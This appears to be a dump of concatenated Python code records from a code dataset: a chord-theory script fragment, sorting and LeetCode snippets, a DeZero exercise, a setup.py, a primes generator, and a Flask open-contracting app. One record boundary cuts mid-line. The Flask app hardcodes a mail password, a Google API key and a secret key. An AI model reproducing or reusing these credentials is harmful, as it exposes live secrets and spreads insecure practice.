cFirstNote=cSecondNote\n if chord.type==ChordType.Minorf5:\n #n print('minorf5')\n chord.notes[2]=NoteShift(True,chord.notes[2])\n output[2]=NoteResult(cNotes[2],chord.notes[2])\n\n #check the speial type \n if chord.sType==None:\n print('no special')\n else:\n if mode.type==ModeType.Major: \n if chord.sType==SChordType.flat:\n chord.notes[0]=NoteShift(True,chord.notes[0])\n output[0]=NoteResult(cNotes[0],chord.notes[0])\n chord.notes[2]=NoteShift(True,chord.notes[2])\n output[2]=NoteResult(cNotes[2],chord.notes[2])\n elif chord.sType==SChordType.D:\n chord.notes[3]=NoteShift(True,chord.notes[3])\n output[3]=NoteResult(cNotes[3],chord.notes[3])\n elif mode.type==ModeType.Minor:\n if chord.sType==SChordType.flat:\n chord.notes[0]=NoteShift(True,chord.notes[0])\n output[0]=NoteResult(cNotes[0],chord.notes[0])\n if chord.sType==SChordType.plus:\n chord.notes[1]=NoteShift(False,chord.notes[1])\n output[1]=NoteResult(cNotes[1],chord.notes[1])\n if chord.sType==SChordType.D:\n chord.notes[0]=NoteShift(False,chord.notes[0])\n output[0]=NoteResult(cNotes[0],chord.notes[0])\n outputString=GetOutput(output)\n if chord.sType==SChordType.GA6 or chord.sType==SChordType.FA6 or chord.sType==SChordType.IA6:\n result= Aug6Chord(mode.root,chord.sType) \n chord.notes=result[0]\n output=result[1]\n outputString=GetOutput(output)\n #print('chord notes are ',chord.notes)\n #print('output is ',output)\n \n return output\n\ndef NoteInRomanCheck():\n mType=ModeType.Major\n for note,index in wholeNoteTable.items():\n print('chord note is ',note)\n for roman in R_N_table:\n print('chord roman is ',roman)\n chord,num,cChord=NoteInRoman(mType,note,roman)\n print('chord root is ',chord)\n print('chord origin is ',cChord)\n print('\\n')\ndef ChordToNotesCheck():\n #inputModeList=['C#','D#','E#','F#','G#','A#','B#']\n inputModeList=['C','cb']\n #inputDisList=['I','II','III','IV','V','VI','VII']\n inputDisList=['DVII']\n #inputDisList=['I+','bII','IV+','V+','GVI','FVI','ItVI']\n\n for inputMode in inputModeList:\n print('input mode is',inputMode)\n for inputDis in inputDisList:\n print('input dis is',inputDis)\n 
inputNum='2'\n output=ChordToNote(inputMode,inputDis,inputNum)\n #print('output is ',output)\n\ndef ChordToNote(mRoot,dis,num):\n if(mRoot[0]==mRoot[0].lower()):\n modeType=ModeType.Minor\n mRoot=mRoot.upper()\n elif(mRoot[0]==mRoot[0].upper()):\n modeType=ModeType.Major\n if(len(mRoot)>1):\n if mRoot[1]=='B':\n mRoot=mRoot[0]+'b'\n print('mode root is',mRoot)\n for note in Note:\n if note.value==mRoot:\n modeRoot=note\n \n #print(modeRoot)\n inputMode=Mode(modeRoot,modeType)\n #print('inputMode mode root is',modeRoot,'input mode mode type is ',modeType)\n if dis[-1]=='+':\n inputSType=SChordType.plus\n dis=dis[:-1]\n #print('in plus')\n \n elif dis[0]=='b':\n inputSType=SChordType.flat\n dis=dis[1:]\n elif dis[0]=='G':\n inputSType=SChordType.GA6\n dis=dis[1:]\n elif dis[0]=='F':\n inputSType=SChordType.FA6\n dis=dis[1:]\n elif dis[0]=='D':\n inputSType=SChordType.D\n dis=dis[1:]\n elif dis[:2]=='It':\n inputSType=SChordType.IA6\n dis=dis[2:]\n else:\n inputSType=None\n\n chordRoot,inputRoman,cChordRoot=NoteInRoman(modeType,modeRoot,dis)\n # print('chord root is ',chordRoot)\n #print(\"input ROman is \",inputRoman)\n #print('cChordRoot is ',cChordRoot)\n if num=='1':\n if(inputMode.type==ModeType.Major):\n #print('input mode type is major')\n chordType=MajModeTtable[inputRoman]\n inputChord= Chord(chordRoot, ChordNum.triad,chordType,inputSType)\n inputChord.notes = [chordRoot]\n #print('inputchord ',inputChord.notes)\n elif(inputMode.type==ModeType.Minor):\n # print('input mode type is minor')\n chordType=MinModeTtable[inputRoman]\n inputChord= Chord(chordRoot, ChordNum.triad,chordType,inputSType)\n inputChord.notes = [chordRoot]\n elif num=='2':\n if(inputMode.type==ModeType.Major):\n chordType=MajModeStable[inputRoman] \n inputChord= Chord(chordRoot,ChordNum.seventhChord,chordType,inputSType)\n inputChord.notes = [chordRoot]\n elif(inputMode.type==ModeType.Minor):\n chordType=MinModeStable[inputRoman] \n inputChord= Chord(chordRoot,ChordNum.seventhChord,chordType,inputSType)\n inputChord.notes = [chordRoot]\n \n output=''\n \n #print('input chord type is ',inputChord.type)\n output=NotesOfChord(inputMode,inputChord,cChordRoot)\n '''\n # result=[]\n result = \"\"\n for note in returnNotes:\n # result.append(note.value)\n result += note.value\n result += \" \"\n return result\n '''\n return output\n# chord table\nmajorModeTable=[[Note.C,Note.D,Note.E,Note.F,Note.G,Note.A,Note.B], \n [Note.D,Note.E,Note.G_f,Note.G,Note.A,Note.B,Note.D_f], \n [Note.E,Note.G_f,Note.A_f,Note.A,Note.B,Note.D_f,Note.E_f],\n [Note.F,Note.G,Note.A,Note.B_f,Note.C,Note.D,Note.E], \n [Note.G,Note.A,Note.B,Note.C,Note.D,Note.E,Note.G_f],\n [Note.A,Note.B,Note.D_f,Note.D,Note.E,Note.G_f,Note.A_f],\n [Note.B,Note.D_f,Note.E_f,Note.E,Note.G_f,Note.A_f,Note.B_f]]\nminorModeTable=[[Note.C,Note.D,Note.E_f,Note.F,Note.G,Note.A_f,Note.B_f],\n [Note.D,Note.E,Note.F,Note.G,Note.A,Note.B_f,Note.C],\n [Note.E,Note.G_f,Note.G,Note.A,Note.B,Note.C,Note.D],\n [Note.F,Note.G,Note.A_f,Note.B_f,Note.C,Note.D_f,Note.E_f],\n [Note.G,Note.A,Note.B_f,Note.C,Note.D,Note.E_f,Note.F],\n [Note.A,Note.B,Note.C,Note.D,Note.E,Note.F,Note.G],\n 
[Note.B,Note.D_f,Note.D,Note.E,Note.G_f,Note.G,Note.A]]\naugChordTable={1:M_I.M3,2:M_I.M3,3:M_I.M2}\nmajorChordTable={1:M_I.M3,2:M_I.m3,3:M_I.M3,4:M_I.m3,5:M_I.m3,6:M_I.M3}\nminorChordTable={1:M_I.m3,2:M_I.M3,3:M_I.m3,4:M_I.M3,5:M_I.m3,6:M_I.M3}\ndominantCHordTable={1:M_I.M3,2:M_I.m3,3:M_I.m3,4:M_I.M3,5:M_I.m3,6:M_I.M3}\nnoteTable={Note.C:1,Note.D_f:2,Note.D:3,Note.E_f:4,Note.E:5,Note.F:6,Note.G_f:7,Note.G:8,Note.A_f:9,Note.A:10,Note.B_f:11,Note.B:12} \nwholeNoteTable={Note.C_f:12,Note.C:1,Note.C_s:2,Note.D_f:2,Note.D:3,Note.D_s:4,Note.E_f:4,Note.E:5,Note.E_s:6,Note.F_f:5,Note.F:6,Note.F_s:7,Note.G_f:7,Note.G:8,Note.G_s:9,Note.A_f:9,Note.A:10,Note.A_s:11,Note.B_f:11,Note.B:12,Note.B_s:0} \nflatCheckTable={Note.C:1,Note.D:2,Note.E:3,Note.F:4,Note.G:5,Note.A:6,Note.B:7} \nflatCheckList=[Note.C,Note.D,Note.E,Note.F,Note.G,Note.A,Note.B]\nflatList=[Note.C_f,Note.D_f,Note.E_f,Note.F_f,Note.G_f,Note.A_f,Note.B_f]\nsharpList=[Note.C_s,Note.D_s,Note.E_s,Note.F_s,Note.G_s,Note.A_s,Note.B_s]\n#roman number table \nR_N_table={'I':1,'II':2,'III':3,'IV':4,'V':5,'VI':6,'VII':7}\n# major mode triad table\nMajModeTtable={1:ChordType.Major,2:ChordType.Minor,3:ChordType.Minor,4:ChordType.Major,5:ChordType.Major,6:ChordType.Minor,7:ChordType.Dim}\n#major mode seventh table\nMajModeStable={1:ChordType.Major,2:ChordType.Minor,3:ChordType.Minor,4:ChordType.Major,5:ChordType.Dominant,6:ChordType.Minor,7:ChordType.Minorf5}\n#minor mode triad table\nMinModeTtable={1:ChordType.Minor,2:ChordType.Dim,3:ChordType.Major,4:ChordType.Minor,5:ChordType.Minor,6:ChordType.Major,7:ChordType.Major}\n#minor mode seventh table\nMinModeStable={1:ChordType.Minor,2:ChordType.Minorf5,3:ChordType.Major,4:ChordType.Minor,5:ChordType.Minor,6:ChordType.Major,7:ChordType.Dominant}\ndef main():\n #main function\n print('input \\'quit\\' to quit')\n \n \n while input()!='quit':\n \n mode=input('Choose your identification mode\\n 1.Chord to note\\n')\n print('mode') \n while mode!='1' and mode!='2':\n mode=input('Wrong input. 
Please input the correct answer\\n')\n '''\n if mode=='1':\n inputValue=input('in note to chord mode\\n input your notes\\n')\n outputChord=Chord()\n notes=inputValue.split()\n for inputNote in notes:\n for note in Note:\n if inputNote==note.value:\n outputChord.addNotes(note)\n outputChord.root=outputChord.notes[0]\n #print(outputChord.notes)\n if len(notes)==3:\n outputChord.num=ChordNum.triad\n elif len(notes)==4:\n outputChord.num=ChordNum.seventhChord\n firstNote=outputChord.root\n secondNote=firstNote\n for note in outputChord.notes:\n secondNote=note\n if secondNote==firstNote:\n continue\n else:\n if noteTable[secondNote] equal[0]:\n right.append(numbers[i])\n else:\n equal.append(numbers[i])\n\n return left + equal + right\n\n\nif __name__ == '__main__':\n input() # skip size\n numbers = list(map(int, input().split()))\n\n result = partition(numbers)\n print(' '.join(map(str, result)))\n","sub_path":"Python/Algorithms/Sorting/Quicksort 1 - Partition v2.py","file_name":"Quicksort 1 - Partition v2.py","file_ext":"py","file_size_in_byte":635,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"265777144","text":"#%%\nif '__file__' in globals(): ## search dezero \n import os, sys\n sys.path.append(os.path.join(os.path.dirname(__file__),\"..\"))\n\nimport numpy as np \nimport dezero.functions as F\nfrom dezero import Variable\n\nx = np.array([1,2,3])\ny = np.broadcast_to(x,(2,3))\nprint(y)\n# %%\nfrom dezero.utils import sum_to\n\nx = np.array([[1,2,3],[4,5,6]])\ny = sum_to(x,(1,3))\nprint(y)\n\ny = sum_to(x,(2,1))\nprint(y)\n# %%\nx0 = np.array([1,2,3])\nx1 = np.array([10])\ny = x0+x1\nprint(y)\n# %%\nx0 = Variable(np.array([1,2,3]))\nx1 = Variable(np.array([10]))\ny = x0+x1\nprint(y)\n\n# %%\nx0 = Variable(np.array([1,2,3]))\nx1 = Variable(np.array([10]))\ny = x0+x1\nprint(y)\ny.backward()\nprint(x1.grad)\n","sub_path":"Chapter4/step40.py","file_name":"step40.py","file_ext":"py","file_size_in_byte":673,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"497763655","text":"class Solution:\n def twoSum(self, nums: List[int], target: int) -> List[int]:\n hash_map = {}\n for i in range(len(nums)):\n remain = target - nums[i]\n if remain in hash_map:\n return [hash_map[remain], i]\n hash_map[nums[i]] = i\n\n def twoSumII(self, numbers: List[int], target: int) -> List[int]:\n first = 0\n last = len(numbers) - 1\n while first <= last:\n if numbers[first] + numbers[last] == target:\n return [first+1, last+1]\n elif numbers[first] + numbers[last] > target:\n last -= 1\n else:\n first += 1\n return [-1, -1]\n","sub_path":"leetcode/sums.py","file_name":"sums.py","file_ext":"py","file_size_in_byte":691,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"18826561","text":"from setuptools import setup\n\nfrom codecs import open\nfrom os import path\n\n# Get the long description from the README file\nlong_description = ''\ntry:\n with open(path.join(path.abspath(path.dirname(__file__)), 'README.rst')) as f:\n long_description = f.read()\nexcept IOError:\n print(\"could not locate README\")\n pass\n\n\nsetup(\n name='pfycat',\n version='0.1.2',\n packages=['pfycat'],\n url='https://gitlab.com/juergens/pfycat',\n long_description=long_description,\n license='',\n author=u'wotaini',\n author_email='pypi@wotanii.de',\n description='python wrapper for gfycat',\n classifiers=[\n 'Development Status :: 4 - Beta',\n 'Intended Audience :: 
Developers',\n        'Topic :: Software Development :: Libraries :: Python Modules',\n    ],\n    install_requires=['requests'],\n)","sub_path":"pypi_install_script/pfycat-0.1.2.tar/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":828,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"}
+{"seq_id":"217444932","text":"#! /usr/bin/python3\n# encoding=utf-8\n\n\ndef natural():\n    n = 2\n    while True:\n        yield n\n        n = n + 1\n\n\ndef odds_it():\n    n = 3\n    while True:\n        yield n\n        n = n + 2\n\n\ndef not_divisible(n):\n    return lambda x: x % n > 0\n\n\ndef primes():\n    it = natural()\n    while True:\n        n = next(it)\n        yield n\n        it = filter(not_divisible(n), it)\n\n\nif __name__ == '__main__':\n    for n in primes():\n        if n > 1000:\n            break\n        print(n)\n","sub_path":"primes.py","file_name":"primes.py","file_ext":"py","file_size_in_byte":484,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"}
+{"seq_id":"271193108","text":"from flask import Flask, Response, render_template, url_for, jsonify, session, request, flash, redirect, send_from_directory, send_file, make_response\nfrom flask_mail import Message, Mail\nimport random, datetime, string, os, webbrowser, json, zipfile, requests\nfrom bson import json_util\nfrom flask import Flask, flash, render_template, json, request, url_for, redirect\nfrom werkzeug import generate_password_hash, check_password_hash\nfrom werkzeug import secure_filename\nfrom flask import session\nfrom time import gmtime, strftime # needed by the zip-download routes below\n\nfrom pymongo import MongoClient\n#from datetime import datetime\nimport datetime\n\n\n####################################app configurations ########################################################\npageLimit = 20\ntoday = datetime.date.today().strftime(\"%Y-%m-%d\")\napp = Flask(__name__)\napp.secret_key = 'why would I tell you my secret key?'\napp.config[\"MAIL_SERVER\"] = \"mail.nigeriaoc.org\"\napp.config[\"MAIL_PORT\"] = 465\napp.config[\"MAIL_USE_SSL\"] = True\napp.config[\"MAIL_USERNAME\"] = 'app@nigeriaoc.org'\napp.config[\"MAIL_PASSWORD\"] = '@nigeria2017'\napp.config['UPLOAD_FOLDER'] = '/media/ruth/U/NOCOPO/static/uploads'\napp.config['ALLOWED_EXTENSIONS'] = set(['txt', 'pdf', 'png', 'jpg', 'jpeg', 'gif', 'json', 'csv', 'docx', 'xlsx', 'xls', 'doc'])\nmail = Mail()\nmail.init_app(app)\nlanguage=\"EN\"\n###############################################################error handlers#####################################################\n\n\n###########################################################################################################################################################\n@app.errorhandler(404)\ndef page_not_found(e):\n    return render_template(\"errors/404.html\"), 404\n\n@app.errorhandler(500)\ndef server_error(e):\n    return render_template(\"errors/500.html\"), 500\n\n@app.errorhandler(403)\ndef forbidden(e):\n    return render_template(\"errors/403.html\"), 403\n\n@app.errorhandler(410)\ndef page_pulled(e):\n    return render_template(\"errors/410.html\"), 410\n\n##############################################################################################Dashboard#####################################################\n\n\n\n\n################################################################utilities###################################################################################\n#####connects to mongo db database and returns Cursor\ndef connect_db():\n    c = MongoClient(host=\"localhost\", port=27017)\n    db = c.open_contracts\n    return db\n\ndb = 
connect_db()\n\n@app.template_filter('datetime')\ndef _jinja2_filter_datetime(date):\n
    # Render an ISO \"YYYY-MM-DDT...\" value as a datetime for templates; parsing\n    # failures now return None instead of being swallowed by a bare except.\n
    if date == \"\" or date == \"null\":\n        return \"null\"\n    try:\n        date = date.split(\"T\")[0]\n        formatted = datetime.datetime.strptime(date, \"%Y-%m-%d\")\n
    except (ValueError, AttributeError):\n        formatted = None\n    return formatted\n\n\ndef js(cursor, ocid=None):\n
    # Serialise either one release (looked up by ocid) or an arbitrary cursor/list\n    # to JSON for use inside templates. (The original sprinkled \"db.close\" here and\n    # in the views below; that is a no-op attribute access in pymongo, which pools\n    # connections itself, so those lines have been removed.)\n
    if ocid is not None:\n        data = list(db.releases.find({\"ocid\": ocid}))\n        for i in data:\n            i.pop(\"_id\")  # ObjectId is not JSON-serialisable\n        data = jsonify(data)\n        try:\n            return data.get_data()\n        except RuntimeError:\n            return \"Oops, Something Went Wrong\"\n    else:\n        return json.dumps(cursor)\n\n\ndef intervals(end, start):\n
    # Human-readable difference between two datetimes, e.g. \"1 years 2 months \".\n    if end in (\"\", \"null\", None) or start in (\"\", \"null\", None):\n        return None\n    tdelta = end - start\n    years = 0\n    months = 0\n    days = 0\n\n
    if tdelta.days >= 365:\n        years = round(tdelta.days / 365)\n        m = tdelta.days % 365\n        if m > 0:\n            months = round(m / 30)\n            days = m % 30\n    elif 30 <= tdelta.days < 365:\n        months = round(tdelta.days / 30)\n        days = tdelta.days % 30\n    else:\n        days = tdelta.days\n\n
    interval = [str(years) + \" years \", str(months) + \" months \", str(days) + \" days \"]\n    diff = \"\"\n    for i in interval:\n        if i[0] != \"0\":\n            diff += i\n    return diff\n\n\ndef repl(stri, old, new):\n
    # Strip characters that break selectors/ids, then apply the replacement.\n    for i in [\")\", \"(\", \".\", \"&\", \"/\", \"'\"]:\n        stri = stri.replace(i, \"\")\n    return stri.replace(old, new)\n\n\ndef allowed_file(filename):\n    return '.' in filename and \\\n           filename.rsplit('.', 1)[1] in app.config['ALLOWED_EXTENSIONS']\n\n\ndef getCoords(address):\n
    # Geocode an address with the Google Geocoding API. The original defined\n    # api_key but never sent it; the API expects it as the \"key\" parameter.\n    api_key = \"AIzaSyCSTh76cAoDiRGgW4k1l_NRn7UMvlihdK0\"  # belongs in config, not in source control\n
    api_response = requests.get(\n        'https://maps.googleapis.com/maps/api/geocode/json?address={0}&key={1}'.format(address, api_key))\n    api_response_dict = api_response.json()\n\n
    if api_response_dict['status'] == 'OK':\n        latitude = api_response_dict['results'][0]['geometry']['viewport']['northeast']['lat']\n        longitude = api_response_dict['results'][0]['geometry']['viewport']['northeast']['lng']\n        return [latitude, longitude]\n\n\ndef bubbles(db_data):\n
    # Dataset for the bubble chart: one point per release that has both a\n    # procurement category and an implementation progress value. (Truthiness\n    # already covers the original's redundant != \"\" checks.)\n    data = []\n
    for element in db_data:\n        if element['planning']['basicdata']['procurementcategory'] and \\\n                element['contracts']['implementation']['tilldate']:\n
            data.append(\n                {\"value\": int(element['planning']['budget']['amount']['amount']), \"name\": element['description'],\n                 \"group\": element['planning']['basicdata']['procurementcategory'],\n                 \"progress\": int(element['contracts']['implementation']['tilldate'])})\n\n    return json.dumps(data)\n\n\n#### parses a 'YYYY-MM-DD' date string 'ocid_date'\ndef parse_datetime(ocid_date):\n
    # Returns a datetime, or None for blank/\"null\" input. (The original returned\n    # False for blanks and carried an unreachable \"null\" branch below that.)\n    if ocid_date == \"\" or ocid_date == \"null\":\n        return None\n    return datetime.datetime.strptime(ocid_date, \"%Y-%m-%d\")\n\n#####################################uploads##################################\n\n##############################################UPLOADS\n\ndef store_upload(section, success_template):\n
    # Shared handler for the three upload routes below, which differed only in the\n    # subdocument updated and the template rendered: save the file, then push its\n    # name onto \"<section>.documents\" for the given release.\n    if not session.get('user'):\n        return render_template('dashboard/error.html', error='Unauthorized Access')\n\n
    # Get the name of the uploaded file\n    file = request.files['file']\n    OCID = request.form['OCID']\n\n    # Check if the file is one of the allowed types/extensions\n    if file and allowed_file(file.filename):\n
        # Make the filename safe, remove unsupported chars\n        filename = secure_filename(file.filename)\n        # Move the file from the temporal folder to the upload folder we setup\n        file.save(os.path.join(app.config['UPLOAD_FOLDER'], filename))\n
        # store filename in mongodb\n        query = db.releases.update_one({\"ocid\": OCID},\n                                       {\"$push\": {section + \".documents\": filename}})\n
        if query.modified_count == 1:  # the original's \"is 1\" only worked via CPython int caching\n            return render_template(success_template)\n
    # the original fell through and returned None here, which Flask rejects\n    return render_template('dashboard/error.html', error='Upload failed')\n\n\n# Route that will process the file upload\n@app.route('/planningUpload', methods=['POST'])\ndef upload():\n    return store_upload('planning', 'myplans.html')\n\n\n@app.route('/tenderUpload', methods=['POST'])\ndef tenderUpload():\n    return store_upload('tender', 'mytenders.html')\n\n\n@app.route('/contractUpload', methods=['POST'])\ndef contractUpload():\n    return store_upload('contracts', 'mycontracts.html')\n\n##########################################end uploads#############################################################\n\n#######################################downloads#####################################################\n\ndef zip_documents(section):\n
    # Shared handler for the three download routes: delete previously stored zips,\n    # bundle the release's documents for `section` and send the archive.\n    directory = os.path.dirname(os.path.abspath(__file__))\n    for item in os.listdir(directory):\n        if item.endswith(\".zip\"):\n            os.remove(os.path.join(directory, item))\n\n
    _id = request.form['OCID']\n    documents = db.releases.find_one({\"ocid\": _id})\n\n    # begin building the new zip\n    timestamp = strftime('%Y-%m-%d:%H-%M-%S', gmtime())\n    zfname = 'files-' + timestamp + '.zip'\n    zf = zipfile.ZipFile(zfname, \"w\")\n
    for dirname, subdirs, files in os.walk(app.config['UPLOAD_FOLDER']):\n        if documents:\n            for documentname in documents[section]['documents']:\n                for filename in files:\n                    if documentname == filename:\n
                        # os.path.join replaces the original \"dirname + filename\",\n                        # which broke whenever dirname lacked a trailing slash\n                        zf.write(os.path.join(dirname, filename), filename)\n    zf.close()\n\n    return send_from_directory(directory, zfname, as_attachment=True)\n\n\n@app.route('/planDownload', methods=['POST'])\ndef planDownload():\n    return zip_documents('planning')\n\n\n# download tender documents\n@app.route('/tenderDownload', methods=['POST'])\ndef tenderDownload():\n    return zip_documents('tender')\n\n\n# download contract documents\n@app.route('/contractDownload', methods=['POST'])\ndef contractDownload():\n    return zip_documents('contracts')\n\n#################################end downloads#############################################################################\n\n###validates a user is registered and signed in to view page 'pathtofile' and returns it\ndef validate_access(pathtofile, vars=None):\n
    if session.get('user'):\n        return render_template(pathtofile, vars=vars)\n    else:\n        return render_template('forms/signin.html',\n                               error='You must be registered and signed in to view any internal contract details')\n\n\n###creates a new release data model and returns a json object with empty release data fields\ndef create_bpp_data_model(ocid, description, agency, ministry):\n
    rl = {\n        \"ocid\": ocid,\n        \"id\": \"ocds-gyl66f-Example MDA-1\",\n        \"description\": description,\n        \"agencyreference\": session[\"reference\"],\n        \"tag\": [\n            \"contract\"\n        ],\n
        \"buyer\": {\n            \"identifier\": {\n                \"legalName\": agency\n            }\n        },\n        \"website\": \"www.uniben.com\",\n        \"date\": \"\",\n        \"language\": \"\",\n        \"tender\": {\n            \"title\": description,\n            
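# NOTE (reviewer): this skeleton loosely follows an OCDS release --\n            # buyer / tender / planning / awards / contracts -- but many keys below\n            # ('advertisementdate', 'advertmedia', the 'planned*' and 'actual*'\n            # milestone lists) are bespoke BPP extensions rather than core OCDS fields.\n            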
\"procuringEntity\": {\n \"additionalIdentifiers\": [\n {\n \"legalName\": ministry\n }\n ],\n \"name\": ministry\n },\n \"description\": description,\n \"status\": \"\",\n \"advertisementdate\": \"\",\n \"advertmedia\": \"\",\n \"value\": {\n \"amount\": 0\n },\n \"procurementMethod\": \"\",\n \"rationale\": \"\",\n \"bppletterofobjection\": \"\",\n \"awardcriteria\": \"\",\n \"awardcriteriadetails\": \"\",\n \"submissionmethod\": \"\",\n \"submissionmethoddetails\": \"\",\n \"hasenquiries\": \"\",\n \"enquiryperiod\": \"\",\n \"enquiryperiodend\": \"\",\n \"haspetition\": \"\",\n \"petitionremark\": \"\",\n \"eligibilitycriteria\": \"\",\n \"numberoftenderers\": \"\",\n \"awardstart\": \"\",\n \"awardend\": \"\",\n \"projtype\": \"\",\n \"tenderPeriodstart\": \"\",\n \"tenderPeriodend\": \"\",\n \"docs\": []\n ,\n \"milestones\": [\n {\n \"status\": \"On-Going\"\n }\n ],\n \"actualadvert\": \"\",\n \"actualadvertend\": \"\",\n \"actualevaluation\": \"\",\n \"actualevaluationend\": \"\",\n \"actualshortlistapprove\": \"\",\n \"actualshortlistapproveend\": \"\",\n \"actualshortlistpublish\": \"\",\n \"actualproposalinvite\": \"\",\n \"actualproposalinviteend\": \"\",\n \"actualopeningoftechprop\": \"\",\n \"actualevaluationtech\": \"\",\n \"actualevaluationtechend\": \"\",\n \"actualevaluationtechapprov\": \"\",\n \"actualevaluationtechapprovend\": \"\",\n \"actualopenfinancialprop\": \"\",\n \"actualsubmittechreport\": \"\",\n \"actualsubmittechreportend\": \"\",\n \"actualnegotiations\": \"\",\n \"actualnegotiationsend\": \"\",\n \"actualprocuringenteval\": \"\",\n \"actualprocuringentevalend\": \"\",\n \"actualcertificateobj\": \"\",\n \"actualcertificateobjend\": \"\",\n \"actualadvertprequal\": \"\",\n \"actualadvertprequalend\": \"\",\n \"actualprequalopening\": \"\",\n \"actualevalpreqalsubm\": \"\",\n \"actualevalpreqalsubmend\": \"\",\n \"actualprequalapprov\": \"\",\n \"actualprequalapprovend\": \"\",\n \"actualprequalpublish\": \"\",\n \"actualfirstbid\": \"\",\n \"actualfirstbidend\": \"\",\n \"actualsecondbid\": \"\",\n \"actualsecondbidend\": \"\",\n \"actualbidinvite\": \"\",\n \"actualbidclose\": \"\",\n \"actualbidevaluation\": \"\",\n \"actualbidevaluationend\": \"\",\n \"actualprocuringenteval\": \"\",\n \"actualprocuringentevalend\": \"\",\n \"actualcertificateobjevalreport\": \"\",\n \"actualcertificateobjevalreportend\": \"\",\n \"actualfecapproval\": \"\",\n \"actualfecapprovalend\": \"\",\n \"actualcontractoffer\": \"\",\n \"actualcontractofferend\": \"\",\n \"actualcontractsignature\": \"\",\n \"actualcontractsignatureend\": \"\",\n \"actualmobilization\": \"\",\n \"actualmobilizationend\": \"\",\n \"actualsubmissiondraftrep\": \"\",\n \"actualsubmissionfinalrep\": \"\",\n \"actualgoodsarrival\": \"\",\n \"actualgoodsarrivalend\": \"\",\n \"actualsubstantialcomplete\": \"\",\n \"actualfinalaccept\": \"\",\n \"actualfinalacceptend\": \"\"\n },\n\n \"planning\": {\n \"identity\": {\n \"rationale\": \"\",\n \"description\": \"\",\n \"package\": \"\",\n \"lot\": \"\"\n },\n \"budget\": {\n \"amount\": {\n \"description\": description,\n \"code\": \"\",\n \"source\": \"\",\n \"amount\": 0,\n \"estimate\": 0\n }\n },\n \"basicdata\": {\n \"procurementcategory\": \"\",\n \"contracttype\": \"\",\n \"procurementmethod\": \"\",\n \"letterofobjection\": \"\",\n \"approvalauthority\": \"\",\n \"selectionmethod\": \"\",\n \"qualification\": \"\",\n \"reviewtype\": \"\"\n },\n \"scheduling\": {\n \"requestforproposalstart\": \"\",\n \"requestforproposalend\": \"\",\n 
\"proposaldocument\": \"\",\n \"plannedadvert\": \"\",\n \"plannedadvertend\": \"\",\n \"plannedevaluation\": \"\",\n \"plannedevaluationend\": \"\",\n \"plannedshortlistapprove\": \"\",\n \"plannedshortlistapproveend\": \"\",\n \"plannedshortlistpublish\": \"\",\n \"plannedproposalinvite\": \"\",\n \"plannedproposalinviteend\": \"\",\n \"plannedopeningoftechprop\": \"\",\n \"plannedevaluationtech\": \"\",\n \"plannedevaluationtechend\": \"\",\n \"plannedevaluationtechapprov\": \"\",\n \"plannedevaluationtechapprovend\": \"\",\n \"plannedopenfinancialprop\": \"\",\n \"plannedsubmittechreport\": \"\",\n \"plannedsubmittechreportend\": \"\",\n \"plannednegotiations\": \"\",\n \"plannednegotiationsend\": \"\",\n \"plannedprocuringenteval\": \"\",\n \"plannedprocuringentevalend\": \"\",\n \"plannedcertificateobj\": \"\",\n \"plannedcertificateobjend\": \"\",\n \"biddingdocsstart\": \"\",\n \"biddingdocsend\": \"\",\n \"biddingdocument\": \"\",\n \"plannedadvertprequal\": \"\",\n \"plannedadvertprequalend\": \"\",\n \"plannedprequalopening\": \"\",\n \"plannedevalpreqalsubm\": \"\",\n \"plannedevalpreqalsubmend\": \"\",\n \"plannedprequalapprov\": \"\",\n \"plannedprequalapprovend\": \"\",\n \"plannedprequalpublish\": \"\",\n \"plannedfirstbid\": \"\",\n \"plannedfirstbidend\": \"\",\n \"plannedsecondbid\": \"\",\n \"plannedsecondbidend\": \"\",\n \"plannedbidinvite\": \"\",\n \"plannedbidclose\": \"\",\n \"plannedbidevaluation\": \"\",\n \"plannedbidevaluationend\": \"\",\n \"plannedprocuringenteval\": \"\",\n \"plannedprocuringentevalend\": \"\",\n \"plannedcertificateobjevalreport\": \"\",\n \"plannedcertificateobjevalreportend\": \"\",\n \"plannedfecapproval\": \"\",\n \"plannedfecapprovalend\": \"\",\n \"plannedcontractoffer\": \"\",\n \"plannedcontractofferend\": \"\",\n \"plannedcontractsignature\": \"\",\n \"plannedcontractsignatureend\": \"\",\n \"plannedmobilization\": \"\",\n \"plannedmobilizationend\": \"\",\n \"plannedsubmissiondraftrep\": \"\",\n \"plannedsubmissionfinalrep\": \"\",\n \"plannedgoodsarrival\": \"\",\n \"plannedgoodsarrivalend\": \"\",\n \"plannedsubstantialcomplete\": \"\",\n \"plannedfinalaccept\": \"\",\n \"plannedfinalacceptend\": \"\"\n },\n \"publishplan\": \"\",\n \"justification\": \"\",\n \"date\": \"\",\n \"docs\": []\n },\n \"awards\": [\n {\n \"title\": description,\n \"reference\": \"\",\n \"description\": description,\n \"status\": \"\",\n \"bppcertificateofobjectionnumber\": \"\",\n \"bppcertificateofobjectiondate\": \"\",\n \"procuringentityapprovaldate\": \"\",\n \"date\": \"\",\n \"value\": {\n \"amount\": 0\n },\n \"suppliers\": [\n {\n \"identifier\": {\n \"legalName\": \"Cursor IP\"\n },\n \"additionalIdentifiers\": [\n {\n \"legalName\": \"Cursor IP\"\n }\n ],\n \"name\": \"Cursor IP\",\n \"bppNO\": \"\"\n }\n ],\n \"contractdetails\": \"\",\n\n \"contractPeriod\": {\n \"startDate\": \"13/9/2014\",\n \"endDate\": \"31/12/2015\"\n },\n \"lowestbidder\": \"\",\n \"justification\": \"\",\n \"amendment\": {\n \"date\": \"0\"\n }\n }\n ],\n \"contracts\":\n {\n \"title\": description,\n \"reference\": \"\",\n \"description\": description,\n \"status\": \"\",\n \"signeddate\": \"\",\n \"period\": {\n \"startDate\": \"13/9/2014\",\n \"endDate\": \"31/12/2015\"\n },\n \"projectlocation\": {\n \"streetaddress\": \"\",\n \"city\": \"\",\n \"state\": \"\",\n \"country\": \"\",\n \"coord\": [9.0820, 8.6753]\n },\n \"docs\": []\n ,\n \"implementation\": {\n \"amountspaid\": [],\n \"projectstatus\": \"\",\n \"finalcost\": 